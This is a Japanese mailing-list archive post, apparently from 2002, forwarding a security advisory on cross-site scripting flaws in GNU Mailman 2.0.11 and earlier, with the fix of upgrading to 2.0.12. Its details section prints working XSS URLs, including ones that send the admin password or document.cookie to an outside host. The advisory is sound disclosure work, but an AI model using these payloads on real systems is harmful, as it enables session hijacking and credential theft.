[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[stalk:01331] [FYI] Mailman のクロスサイトスクリプティング脆弱性



------------------------ infoseek ML Sponsor ------------------------
┏━┳━┳≪TaylorMade 新次元ドライバー R500発売!≫━━┳━┳━┓
┃R┃5┃0┃0┃シ┃リ┃ー┃ズ┃発┃売┃キ┃ャ┃ン┃ペ┃ー┃ン┃!┃
┗━┻━┻━┻━┻━┻━┻━┻━┻━┻━┻━┻━┻━┻━┻━┻━┻━┛
★日本全国選べるゴルフ&リゾート4名様1組を10名様にプレゼント!!
締め切り迫る → http://www.taylormadegolf.com/japan/prm/info-tw2.asp
---------------------------------------------------------------------


【Mailmanのクロスサイトスクリプティング脆弱性】

プロダクト名:     Mailman
脆弱なバージョン: 2.0.11 およびそれ以下
ホームページ:     http://www.gnu.org/software/mailman/
問題の回避方法:   バージョン 2.0.12 かそれ以降のものを使う


【詳細】
-----------------
バージョン 2.0.10 についての脆弱性の最も単純な確認は

http://mailman_site/mailman_dirctory/admin/ml-name?"><script>alert("hello")</script>

というような形式のURLにアクセスすることによってできる。このような
URLへのアクセスによってJavaScriptによるポップアップウィンドウの出現
が確認された場合、この事実は任意の(悪意ある)JavaScriptが起動させ
られる危険性を証明している。

悪用例として、次のようなURLがバージョン2.0.10に対して可能である。

http://mailman_site/mailman_dirctory/admin/ml-name?adminpw="></form><form/action="http://www.office.ac/webform.cgi"/method="post"><br

このURLにインターネットエクスプローラでアクセスした場合(他のブラウザ
に対してはこのURLは有効でない)、表示されるページは通常のページと同じ
に見えるが、管理者パスワードを入力して送信ボタンを押すと、そのパスワー
ドは、別の悪意あるサイト(この例では http://www.office.ac/ )に送られ
てしまう。

上記はバージョン2.0.10に対して有効なURLであったが、バージョン2.0.11も
また脆弱である。次のようなURLにインターネットエクスプローラでアクセス
した場合(他のブラウザに対してはこのURLは有効でない)、このサイトに関
するクッキーの情報を他の悪意あるサイト(この例では http://www.office.ac/ )
に送られてしまう。

http://mailman_site/mailman_dirctory/admin/ml-name?adminpw="/onClick="window.open('http://www.office.ac/j.cgi?'+document.cookie);

http://mailman_site/mailman/subscribe/ml-name?info=<script>document.location%3D"http://www.office.ac/j.cgi?"%2Bdocument.cookie;</script>


【開発者の対応状況】
--------------
最初の脆弱性報告は 2002年5月20日に行われ、同日にそれが対策されたバージョ
ン 2.0.11 がリリースされた。
http://mail.python.org/pipermail/mailman-announce/2002-May/000042.html

2.0.11 に残る脆弱性について2002年5月21日に報告がなされ、それらが対策
されたバージョン 2.0.12 が2002年7月11日にリリースされた。
http://mail.python.org/pipermail/mailman-announce/2002-July/000043.html

【対応策】
--------------
Mailman 2.0.12 かそれ以降のバージョンを使用すること

--
office
office@xxxxxxxx
office@xxxxxxxxx
http://www.office.ac/
--
- このメイリングリストに関する質問・問い合せ等は
- <security-talk@xxxxxxxxxx>までお知らせください
--
------------------------------------------------------------------------
     ★「え?あの商品がこの値段♪」見てる人は『得』してる!
         http://ap.infoseek.co.jp/is_shop2.html